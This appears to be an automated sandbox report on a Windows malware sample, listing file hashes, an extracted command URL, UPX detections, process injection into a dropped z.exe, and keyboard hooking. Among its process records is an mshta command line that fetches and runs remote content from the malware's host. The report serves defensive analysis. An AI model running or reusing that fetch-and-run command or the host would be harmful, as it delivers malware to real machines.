Analysis
- max time kernel: 1s
- max time network: 126s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system
- submitted: 08/01/2024, 23:56
Behavioral task: behavioral1
- Sample: 4ccacea000c555b1a333175803ba0af5.exe
- Resource: win7-20231215-en
Behavioral task: behavioral2
- Sample: 4ccacea000c555b1a333175803ba0af5.exe
- Resource: win10v2004-20231215-en
General
- Target: 4ccacea000c555b1a333175803ba0af5.exe
- Size: 691KB
- MD5: 4ccacea000c555b1a333175803ba0af5
- SHA1: 8e919e3a04036ee3b5122d3fb047d907d23d1e3d
- SHA256: f81cea3cf23dc2d75ad5c9deb707b07807c90a55520e441a7630aa7573f95bb0
- SHA512: 0bca51112c16fe66ac910289bf665168f25d71c4101123987c0afafdc698b93549eaf82e64be315ff9296cb3710a7d6375543952ab8e13f8d0aaf8de795d13ea
- SSDEEP: 12288:MSJsWPOGw+qYwxPsw5gubWPRJ+wsHdLgRU3M7tToSGRpQ7E5x36NuP:MSnwKwauipJXlCc7tkSGRWix36
Malware Config
- Extracted: http://rerererererere.com/inst.php?id=forbidden
Signatures
- Executes dropped EXE (1 IoCs)
  pid 2728 | Process z.exe
- Loads dropped DLL (2 IoCs)
  pid 3048 | Process 4ccacea000c555b1a333175803ba0af5.exe
  pid 3048 | Process 4ccacea000c555b1a333175803ba0af5.exe
- YARA rule matches (resource | yara_rule)
  behavioral1/memory/3048-0-0x0000000000400000-0x0000000000507000-memory.dmp | upx
  behavioral1/files/0x0009000000012224-14.dat | upx
  behavioral1/memory/3048-18-0x00000000030C0000-0x00000000034BC000-memory.dmp | upx
  behavioral1/files/0x0009000000012224-23.dat | upx
  behavioral1/memory/2728-19-0x0000000000400000-0x00000000007FC000-memory.dmp | upx
  behavioral1/memory/3048-17-0x0000000000400000-0x0000000000507000-memory.dmp | upx
  behavioral1/files/0x0009000000012224-16.dat | upx
  behavioral1/files/0x0009000000012224-12.dat | upx
  behavioral1/files/0x0009000000012224-10.dat | upx
  behavioral1/memory/2728-36-0x0000000000400000-0x00000000007FC000-memory.dmp | upx
  behavioral1/memory/2728-37-0x0000000000400000-0x00000000007FC000-memory.dmp | upx
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid 2728 | Process z.exe
  pid 2728 | Process z.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  description | pid | Process | procid_target
  PID 3048 wrote to memory of 2728 | 3048 | 4ccacea000c555b1a333175803ba0af5.exe | 24
  PID 3048 wrote to memory of 2728 | 3048 | 4ccacea000c555b1a333175803ba0af5.exe | 24
  PID 3048 wrote to memory of 2728 | 3048 | 4ccacea000c555b1a333175803ba0af5.exe | 24
  PID 3048 wrote to memory of 2728 | 3048 | 4ccacea000c555b1a333175803ba0af5.exe | 24
Processes
- C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 3048
  - C:\Users\Admin\AppData\Roaming\z.exe
    Command line: "C:\Users\Admin\AppData\Roaming\z.exe" forbidden
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID: 2728
- C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c ""C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat" "
  PID: 1312
- C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\System32\mshta.exe" http://rerererererere.com/inst.php?id=forbidden
  PID: 2588
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 167B
  MD5: e5a2cf708be039ebe72233673c1f2ac7
  SHA1: cca4b5f8c08e07779f4eddd7e3c960d7f68078f8
  SHA256: 1f67a80290e77b7ec48c8b676bcc076ff5b271e2caf17352b1880d65a956e43c
  SHA512: 0d47a1ccf419c4cb8fc1a25b35470ba3b51e49a6045fe1efcd533ebbe9d69a92a1a7b60f2666e1419613c0bd45ffd128623adb11c313c1b3749727f5a4a9f645
- Filesize: 2KB
  MD5: 8dd8a82ab6a26e8334c40c7f27dadeeb
  SHA1: 0c113f851beb5e826619a532f43c188eb3318462
  SHA256: 493b37eb7748239d3e6ef899de9f86cd4124b4e6aeecd2a09a2afed35c74b27a
  SHA512: 886602b8a1c43cc295c4a55ec7921af40ed1cd7654aa7d393a6ef117c7b78e3875b97e60229c80c86e078acaaec632c9bfcd6338d7760c9242aa85792e2bf331
- Filesize: 1KB
  MD5: 64493807b631d4640721422f65db10f4
  SHA1: 426ef0d69ec6c4b7d60931efc2c312a1670b6ded
  SHA256: 17868f7672fb1ef5d208e640ef963b3f5257ec6dfabd8538b77c95b7a6f685ce
  SHA512: 9d3d0be0e1fe2868b462f0cdeff0a26e483edc4ff2b616ab557e650568465c143865fb70cd15df478d15609a5c2a00063e0792f05bc8f07c332f34e2d27b307f
- Filesize: 12KB
  MD5: 294d4f3a470fd19559b3714967a238a1
  SHA1: 4231bbd7ebe6e1413ec06528532da616cb3e74b9
  SHA256: 065ead59437163606059257e4efb110e2313b524c8ffb0d5bc964512994e2571
  SHA512: a576888b91cbb8332c9246bd12565474026ed256864c4cc334311becc1a3af6663e9c853ba51d7b2ab022468d81d376b98de82ca9582f3ba1685f24fdbe7e9ef
- Filesize: 45KB
  MD5: a02ded02c5c7d23f5678a922dab56726
  SHA1: 4f42ce884ddfec7577d3f340deca9565feb7ecaa
  SHA256: 49edb7ecf9ea7cb90a59ebda9f7adcc1af8694f432b51ca74fd41ba378a5ca65
  SHA512: f35213cf69e978b000e79dd377c434eaac6cfe37fc47f6e4568f9da7531394ad2142383cdc19d30868488c62518f8f4fa8a8a27d2b24f121067746b2dce3eb26